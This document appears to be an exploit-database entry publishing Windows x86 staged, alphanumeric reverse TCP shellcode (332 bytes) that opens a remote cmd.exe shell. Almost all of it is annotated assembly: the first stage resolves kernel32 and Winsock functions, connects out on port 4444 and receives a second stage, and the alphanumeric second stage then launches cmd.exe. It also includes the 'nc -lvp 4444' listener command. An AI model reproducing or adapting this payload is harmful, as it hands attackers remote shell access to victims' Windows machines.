Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)

Author: Snir Levi Published: 2017-03-02 Verified: Verified



########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
            ########### Author: Snir Levi, Applitects #############
                                ## 332 Bytes ##
                    ## For Educational Purposes Only ##
Date: 01.03.17
Author: Snir Levi
IP -
PORT -  4444    
Tested on:
Windows 7
Windows 10
                Victim Executes the first stage shellcode, and opens tcp connection
                After Connection is established, send the Alphanumeric stage to the connection     
                nc -lvp 4444
                connect to [] from localhost [] (port)
                Microsoft Windows [Version 10.0.14393]
                (c) 2016 Microsoft Corporation. All rights reserved.
#### Second Stage Alphanumeric shellcode: #####
R       push edx
P       push eax
hoces   push 0x7365636f //oces
htePr   push 0x72506574 //tePr
hCrea   push 0x61657243 //Crea
T       push esp
Q       push ecx
PX      will be replaced with call [esi] (0x16ff)
L*8     dec esp // offset esp to kernel32.dll Address
Y       pop ecx // ecx = kernel32
F*4     inc esi -> offset [esi+4]
PX      will be replaced with mov [esi],eax (0x0689)
N*4     dec esi -> offset [esi]
j0      push 0x30
X       pop eax
H*48    dec eax  // zeroing eax
P       push eax
hessA   push 0x41737365 //essA (will be null terminated)
hProc   push 0x636f7250 //Proc
hExit   push 0x74697845 //Exit
T       push esp
Q       push ecx
PX      will be replaced with call [esi] (0x16ff)
F*8     inc esi -> offset [esi+8]
PX      will be replaced with mov [esi],eax (0x0689)
Z*10    offset stack to &processinfo
j0      push 0x30
Y       pop ecx
I*48    dec ecx  // zeroing ecx
T       push esp
X       pop eax  //eax = &PROCESS_INFORMATION
Q*4     push ecx //sub esp,16
W       push edi
W       push edi
W       push edi
Q       push ecx
Q       push ecx
B       inc edx
R       push edx
Q*10    push ecx
jD      push 0x44
T       push esp
Z       pop edx  //edx = &STARTUPINFOA
hexeC   push 0x65
hcmd.   push 0x78652e64
T       push esp // &'cmd.exe'
Y       pop ecx
P       push eax // &PROCESS_INFORMATION
R       push edx // &STARTUPINFOA
j0      push 0x30
Z       pop edx
J*48    dec edx // zeroing edx
R*3     push edx
B       inc edx
R       push edx
J       dec edx
R*2     push edx
Q       push ecx ; &'cmd.exe'
R       push edx
A*7     inc ecx //offset ecx to [C]exeh -> will be null terminated
N*4     dec esi //offset [esi+4] to CreateProccesA
S       push ebx ; return address
## First Stage Shellcode ##
global _start
section .text
    xor eax,eax
    push eax ; null terminator for createProcA
    mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
    mov eax,[eax+0xc]
    mov esi,[eax+0x14]
    xchg esi,eax
    mov ebx,[eax+0x10] ; kernel32
    mov ecx,[ebx+0x3c] ; DOS->elf_anew
    add ecx, ebx; Skip to PE start
    mov ecx, [ecx+0x78] ; offset to export table
    add ecx,ebx ; kernel32 image_export_dir
    mov esi,[ecx+0x20] ; Name Table
    add esi,ebx
    xor edx,edx
        inc edx
        add eax,ebx
        cmp dword [eax],'GetP'
        jne getProcAddress
        cmp dword [eax+4],'rocA'
        jne getProcAddress
    ;---Function Adresses Chain----
    ;[esi]      GetProcAddress
    ;[esi+12]   WSAstartup
    ;[esi+16]   WSASocketA
    ;[esi+20]   connect
    ;[esi+24]   recv
    ;[esi+28]   kernel32
    ;Alphanumeric stage store:
    ;[esi+4]    CreateProcessA
    ;[esi+8]    ExitProccess
    mov esi,[ecx+0x1c] ; Functions Addresses Chain
    add esi,ebx
    mov edx,[esi+edx*4]
    add edx,ebx ; GetProcAddress
    sub esp, 32 ; Buffer for the function addresses chain
    push esp
    pop esi
    mov [esp],edx ; esi offset 0 -> GetProcAddress
    mov [esi+28],ebx ;esi offset 28 -> kernel32
    ;--------winsock2.dll Address--------------
    xor edi,edi
    push edi
    push 0x41797261 ; Ayra
    push 0x7262694c ; rbiL
    push 0x64616f4c ; daoL
    push esp
    push ebx
    call [esi]
    ;-----ws2_32.dll Address-------
    xor ecx,ecx
    push ecx
    mov cx, 0x3233   ; 0023
    push ecx
    push 0x5f327377  ; _2sw
    push esp
    call eax
    mov ebp,eax ;ebp = ws2_32.dll
    ;-------WSAstartup Address-------------
    xor ecx,ecx
    push ecx
    mov cx, 0x7075      ; 00up
    push ecx
    push 0x74726174     ; trat
    push 0x53415357     ; SASW
    push esp
    push ebp
    call [esi]
    mov [esi+12],eax ;esi offset 12 -> WSAstartup
    ;-------WSASocketA Address-------------
    xor ecx,ecx
    push ecx
    mov cx, 0x4174 ; 00At
    push ecx
    push 0x656b636f ; ekco
    push 0x53415357 ; SASW
    push esp
    push ebp
    call [esi]
    mov [esi+16],eax;esi offset 16 -> WSASocketA
    ;------connect Address-----------
    push edi
    mov ecx, 0x74636565 ; '\0tce'
    shr ecx, 8
    push ecx
    push 0x6e6e6f63     ; 'nnoc'
    push esp
    push ebp
    call [esi]
    mov [esi+20],eax;esi offset 20 -> connect
    ;------recv Address-------------
    push edi
    push 0x76636572 ;vcer
    push esp
    push ebp
    call [esi]
    mov [esi+24],eax;esi offset 24 -> recv
    ;------call WSAstartup()----------
    xor ecx,ecx
    sub sp,700
    push esp
    mov cx,514
    push ecx
    call [esi+12]
    ;--------call WSASocket()-----------
    ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
    ; IPPROTO_TCP = 6, NULL,
    ;(unsigned int)NULL, (unsigned int)NULL);
    push eax ; if successful, eax = 0
    push eax
    push eax
    mov al,6
    push eax
    mov al,1
    push eax
    inc eax
    push eax
    call [esi+16]
    xchg eax, edi   ; edi = SocketRefernce
    ;--------call connect----------
    ;struct sockaddr_in {
    ;   short   sin_family;
    ;   u_short sin_port;
    ;   struct  in_addr sin_addr;
    ;   char    sin_zero[8];
    push byte 0x1
    pop edx
    shl edx, 24
    mov dl, 0x7f    ;edx = (hex)
    push edx
    push word 0x5c11; port 4444
    push word 0x2
    ;int connect(
    ;_In_ SOCKET                s,
    ;_In_ const struct sockaddr *name,
    ;_In_ int                   namelen
    mov edx,esp
    push byte 16 ; sizeof(sockaddr)
    push edx ; (sockaddr*)
    push edi ; socketReference
    call [esi+20]
    ;--------call recv()----------
    ;int recv(
    ;_In_  SOCKET s,
    ;_Out_ char   *buf,
    ;_In_  int    len,
    ;_In_  int    flags
    push eax
    mov ax,950
    push eax    ;buffer length
    push esp
    pop ebp
    sub ebp,eax ; set buffer to [esp-950]
    push ebp    ;&buf
    push edi    ;socketReference
    call [esi+24]
    xor edx,edx
    mov byte [ebp+eax-1],0xc3   ; end of the Alphanumeric buffer -> ret
    mov byte [ebp+96],dl ; null terminator to ExitProcess
    mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
    dec ebp
    mov word [ebp+20],0x16ff ; call DWORD [esi]
    mov word [ebp+35],0x0689 ; mov [esi],eax
    mov word [ebp+110],0x16ff; call DWORD [esi]
    mov word [ebp+120],0x0689; mov [esi],eax
    mov ax,0x4173 ; As (CreateProcessA)
    mov ecx,[esi+28] ; ecx = kernel32
    dec dl ;edx = 0x000000ff
    call ebp ; Execute Alphanumeric stage
    mov [ecx],dl    ;null terminator to 'cmd.exe'
    call dword [esi] ;createProcA
    push eax
    call dword [esi+4] ; ExitProccess
unsigned char shellcode[]=